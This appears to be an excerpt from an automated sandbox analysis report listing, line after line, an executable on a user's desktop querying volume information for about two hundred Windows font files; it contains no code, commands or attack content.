          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
